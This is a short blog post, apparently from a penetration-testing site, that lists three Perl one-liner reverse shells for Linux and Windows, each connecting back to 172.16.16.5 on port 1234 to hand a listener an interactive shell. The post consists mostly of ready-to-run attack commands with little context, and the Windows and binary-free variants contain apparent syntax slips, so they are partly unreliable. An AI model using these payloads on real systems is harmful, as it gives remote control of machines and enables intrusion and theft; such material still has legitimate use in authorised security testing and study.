Let’s spawn a few perl reverse shells, in various environments. Why? Because Perl is that diverse.

 

Perl Reverse Shells

 

If you’re just getting into writing code, python comes heavily recommended. But, if code auditing is something you’re wanting to get into, jumping straight into perl might be more beneficial. And, yes, these are all built to be executed on a single line.

 

A linux reverse shell using /bin/sh

 

perl -e 'use Socket; $i="172.16.16.5"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S");open(STDOUT,">&S"); open(STDERR, ">&S"); exec("/bin/sh -i");};'

 

perl reverse shell connecting back to ncat
perl reverse shell connecting back
ncat listening for the perl reverse shell to connect
ncat listening and accepting

 

A Windows reverse shell using Perl

 

It’s actually not uncommon to find perl installed on Windows Servers

 

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr, "172.16.16.5:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);$_ while<>;'

 

Perl reverse shell without using /bin/sh

 

Perl is so versatile that we can do some amazing things with it. Watch us spawn a reverse shell without using a binary!

 

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr, "172.16.16.5:1234");STDIN->fdopen($c,r);$~->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

 

Feel free to comment, if you’ve got some more reverse shells. We do have moderation enabled, but we’re pretty lenient with the content here, at Gray Hat Freelancing.